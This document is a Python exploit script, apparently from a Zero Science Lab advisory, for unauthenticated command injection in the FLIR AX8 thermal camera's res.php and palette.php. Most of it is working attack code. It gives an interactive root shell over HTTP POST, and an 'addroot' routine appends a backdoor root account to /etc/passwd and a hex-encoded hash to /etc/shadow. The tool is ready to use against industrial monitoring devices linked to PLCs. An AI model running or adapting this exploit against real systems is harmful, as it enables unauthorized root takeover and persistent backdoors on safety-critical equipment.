#!/usr/bin/env python # -*- coding: utf-8 -*- # # FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit # # # Vendor: FLIR Systems, Inc. # Product web page: https://www.flir.com # Affected version: Firmware: 1.32.16 # 1.17.13 # OS: neco_v1.8-0-g7ffe5b3 # Hardware: Flir Systems Neco Board # # Summary: Thermal Imaging Camera For Continuous Condition and Safety # Monitoring FLIR AX8 is a thermal sensor with imaging capabilities. # Combining thermal and visual cameras in a small, affordable package, # the AX8 provides continuous temperature monitoring and alarming capabilities # to protec critical electrical and mechanical equipment. The AX8 helps # you guard against unplanned outages, service interruptions, and equipment # failure. # # The FLIR AX series camera/sensor also has built-in support to connect to # industrial control equipment such as programmable logic controllers (PLCs), # and allows the sharing of analysis and alarm results and simple control # using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy # to install, the AX8 provides continuous monitoring of electrical cabinets, # process and manufacturing areas, data centers, energy generation and distribution, # transportation and mass transit, storage facilities and refrigeration warehouses. # # Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated # command injection vulnerabilities. The issues can be triggered when calling # multiple unsanitized HTTP GET/POST parameters within the shell_exec function # in res.php and palette.php file. This can be exploited to inject arbitrary # system commands and gain root remote code execution. # # ============================================================================= # /FLIR/usr/www/res.php: # ---------------------- # 1. # # ============================================================================= # # # Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l) # lighttpd/1.4.33 # PHP/5.4.14 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2018-5491 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php # # # 26.07.2018 # import requests import colorama import random## import time#### import json#### import sys##### import os###### piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '\n\x20\x20[*] Usage: '+piton+' \n' sys.exit() bannah = """ .---------------------------------. | 1984 Pictures | | | | presents | | ___ | | [| |=|{)__ | | |___| \/ ) | | /|\ /| | | / | \ | \\ | .---------------------------------. """ print bannah time.sleep(4) os.system('clear') print '\nFLIR AX8 Thermal Camera Remote Root Exploit' print 'By Zero Science Lab' ICU = ''' ```````` `./+ooosoooooo+/.` `.+ss+//:::::::://+ss+.` -oyo/::::-------:::::/oyo- `/yo+:::-------.------:::+oy/` `+yo+::---...........----:/+oy+` `/yo++/--...../+oo+:....---:/+oy/` `ss++//:-.../yhhhhhhy/...-://++ss` .ho++/::--.-yhhddddhhy-.--:://+oh. .ho+//::---/mmmmmmmmmm:---::/++oh. `ss++//::---+mNNNNNNm+---:://++ss` `/yo+//:::----+syys+-----://++oy/` `+yo++//:::-----------:://++oy+` `/yo++///:::::-:::::://+++oy/` .oyo+++////////////+++oyo. `.+ssoo++++++++++ooss+.` `./+osssssssso+/.` ```````` ''' colors = list(vars(colorama.Fore).values()) colored_chars = [random.choice(colors) + char for char in ICU] print(''.join(colored_chars)) print print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on' print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n' print '[*] Additional commands:' print ' [+] \'addroot\' for add root user.' print ' [+] \'exit\' for exit.\n' while True: zeTargets = 'http://'+sys.argv[1]+'/res.php' zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m') zeHeaders = {'Cache-Control' : 'max-age=0', 'User-Agent' : 'thricer/251.4ev4h', 'Accept' : 'text/html,application/xhtml+xml', 'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'mk-MK,mk;q=1.7', 'Connection' : 'close', 'Connection-Type' : 'application/x-www-form-urlencoded'} zePardata = {'action' : 'get', 'resource' : ';'+zeCommand} try: zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata) print json.loads(zeRequest.text) if zeCommand.strip() == 'exit': sys.exit() if zeCommand.strip() == 'addroot': print '[+] Blind command injection using palette.php...' print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...' nuTargets = 'http://'+sys.argv[1]+'/palette.php' nuHeaders = zeHeaders nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31' '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f' '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d' '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45' '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67' '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36' '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39' '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a' '\\x3a\\x3a\\x0a\\x0d') nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'} nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'} requests.post(nuTargets, headers=nuHeaders, data=nuPadata1) time.sleep(2) requests.post(nuTargets, headers=nuHeaders, data=nuPadata2) print '[*] Success!\n' else: pass except Exception: print '[*] Error!' break sys.exit()